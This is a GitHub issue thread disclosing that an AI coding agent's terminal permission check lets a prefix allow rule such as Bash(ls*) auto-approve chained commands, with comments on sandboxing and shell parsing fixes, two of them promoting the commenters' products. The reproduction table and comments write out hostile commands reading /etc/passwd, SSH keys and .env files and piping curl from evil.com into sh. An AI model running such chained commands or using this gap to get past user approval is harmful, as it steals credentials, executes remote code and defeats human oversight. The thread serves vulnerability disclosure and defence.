Skip to content

HITL bypass: Bash(prefix*) static allow matches chained commands — user-preference-wins overrides dynamic security evaluator ask #13288

Description

@Tardfyou

Summary

When a user configures an allow rule like Bash(ls*) for the terminal tool, the permission checker converts the pattern to regex ^ls.*$ and tests it against the entire command string — including chained commands after ;, &&, or |. Additionally, checkToolPermission implements a "user preference wins" policy: if the static rule says allow, the dynamic security evaluator's ask recommendation is overridden.

Combined effect: approving ls -la permanently auto-approves any command starting with ls — including ls; cat /etc/passwd, ls && find /home -name .env, or ls; curl http://evil.com | sh.

Root cause

  1. Static pattern matching (permissionChecker.ts:42-57): Bash(ls*) → regex ^ls.*$ tested against the FULL command string, not just the first command.

  2. Dynamic evaluator override (permissionChecker.ts:161-174): checkToolPermission implements "user preference wins" — if the static rule says allow, the dynamic security evaluator's ask is discarded:

    if (evaluatedPolicy === "disabled") { return "exclude"; }
    return { permission: basePermission };  // static allow overrides evaluator "ask"
  3. No compound-command splitting (tool/bash.ts): unlike Zed (which parses sub-commands via brush-parser) or AutoGPT (which splits on ;/&&), Continue passes the raw command string to the permission checker without parsing it into individual sub-commands.

Reproduction (fully offline)

import { evaluateTerminalCommandSecurity } from "packages/terminal-security/src/evaluateTerminalCommandSecurity.ts";

// User config: Bash(ls*) -> allow
// The static rule matches the ENTIRE command:
const matches = new RegExp("^ls.*$").test("ls; cat /etc/passwd");  // true

// Dynamic evaluator says "ask":
const dynamic = evaluateTerminalCommandSecurity("allowedWithPermission", "ls; cat /etc/passwd");
// -> "allowedWithPermission"

// But "user preference wins" overrides:
// -> final permission = "allow" -> executes without prompting

Tested payloads (all with base policy Bash(ls*) -> allow):

command static match dynamic evaluator final effect
ls ✅ allow — AUTO-EXEC ✓ safe
ls; cat /etc/passwd ✅ allow ask AUTO-EXEC 🚨 reads /etc/passwd
ls && find /home -name .env ✅ allow ask AUTO-EXEC 🚨 credential discovery
ls; cat ~/.ssh/id_rsa ✅ allow ask AUTO-EXEC 🚨 SSH key theft
ls; curl http://evil.com | sh ✅ allow ask AUTO-EXEC 🚨 RCE
ls; python3 -c 'import os; os.system("…")' ✅ allow ask AUTO-EXEC 🚨 RCE

Impact

Once a user approves a benign prefix command (e.g., ls -la), any subsequent prompt-injected command starting with that prefix — including chained destructive or exfiltration commands — executes silently without any user interaction. The confirmation dialog the user trusts is effectively disabled for that prefix.

Suggested fix

  1. Split compound commands on ;, &&, || before pattern matching (as Continue's own evaluateTerminalCommandSecurity already does for its dynamic evaluator)
  2. Match each sub-command independently against the static rules
  3. If any sub-command fails to match the allow rule, require explicit approval for the full command

Credit

Chengzhi Yi — yimou@hust.edu.cn — GitHub: @Tardfyou

Activity

  1. shleder commented on Sep 24, 2026

    @shleder

    Prefix-based regex matching for shell commands (^prefix.*$) is fundamentally unsound because POSIX shell interpreters treat ;, &&, ||, |, &, newline, and backticks as command separators. Furthermore, building an AST parser in userspace to catch all subshells, aliases, parameter expansions, and process substitutions (<(cmd)) is practically intractable.

    When an allow rule like Bash(ls*) matches chained commands (e.g. ls; cat /etc/passwd or ls && curl http://evil.com | sh), attempting to fix it by expanding regex checks only leads to another parsing loophole.

    The architectural solution is to enforce security boundaries at the OS kernel level rather than parsing command strings:

    1. Kernel-Level VFS Sandboxing: Instead of evaluating whether a chained command string looks safe, execute the shell inside an unprivileged sandbox where the process physically lacks permissions to access sensitive files. Landlock LSM (ABI 1–6) restricts openat and unlinkat at the kernel level, ensuring that even if cat /etc/passwd or rm -rf / is chained, the kernel immediately denies the syscall with EACCES.
    2. Inode-Level Secret Masking: Using unprivileged mount namespaces (CLONE_NEWUSER | CLONE_NEWNS) with empty tmpfs overlays over ~/.ssh, ~/.aws, and .env guarantees that credential exfiltration is impossible even with arbitrary shell chaining.
    3. Network Egress Filtering: Isolating the network namespace (CLONE_NEWNET) and routing traffic through a local L7 proxy with TLS SNI inspection prevents unauthorized outbound network connections from piped shell commands.

    We implemented this in Vetto. Vetto removes reliance on shell command regex matching by enforcing Landlock LSM boundaries, unprivileged namespaces, and secret masking between fork() and execve() in under 4ms, ensuring that chained or obfuscated commands cannot violate security boundaries.

    Disclaimer: I am the author/maintainer of Vetto.

  2. DSHCorrectover commented on Oct 5, 2026

    @DSHCorrectover

    Splitting on ;/&&/|| as suggested is necessary but not sufficient — four concrete cases a naive separator split leaves open, which are worth designing into the fix:

    1. Pipes run every stage, not just the last one. ls | sh and ls | curl http://evil.com --data-binary @- have no listed separator at all, and the destructive/exfil side isn't even the final command. Every simple command in the pipeline needs to be checked independently.
    2. Substitution executes during expansion, before the "outer" command runs. ls $(curl http://evil.com|sh), ls `rm -rf $HOME`, ls <(nc ...), and ls !-1 (history expansion) all carry executable payloads the split never reaches. The evaluator must recurse into command/process substitutions, not just the top-level chain.
    3. The glob must match the resolved command word, not the substring. ^ls.*$ against the full string is what matches ls; .... Match each simple command's argv[0] instead, so lsfoo and false-style lookalikes don't match the ls rule; literal glob prefixes like ls* should mean "this command word", and anything after the word (args, operators) is outside the match.
    4. Verdict combination should be most-restrictive, and parse failure must be fail-closed. If any sub-command's static rule isn't allow, the whole call drops to ask; if the parser can't tokenize the string (encoding tricks, exotic syntax), the safe default is ask — never "couldn't parse → run it".

    On tooling: shell-quote is lossy for exactly this job (it stringifies $HOME to an empty token — the same root issue as #13001). A real shell grammar is the right level: the mvdan/sh Go parser is one option; in a pure Node path, a WebAssembly build of a POSIX/bash grammar (or tree-sitter-bash) gives a proper AST to walk, including substitutions and pipelines. It pairs naturally with the precedence fix — static preference should only ever narrow a dynamic verdict, never widen it: final = mostRestrictive(static, dynamic) with disabled > ask > allow.


    Independent-layer note: we build agent-runtime-guard, a local, fail-closed interception layer for agent tool calls — it evaluates the resolved compound command, pipelines and substitutions included, and signs an Ed25519 receipt per verdict rather than relying on a single static-prefix gate. It runs free with no key or account, and if it doesn't actually stop this class of attack in your setup, you owe nothing — it has to solve the problem first. The only paid side is human audit/compliance work.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

      Milestone

      No milestone

      Relationships

      None yet

      Development

      No branches or pull requests

      Issue actions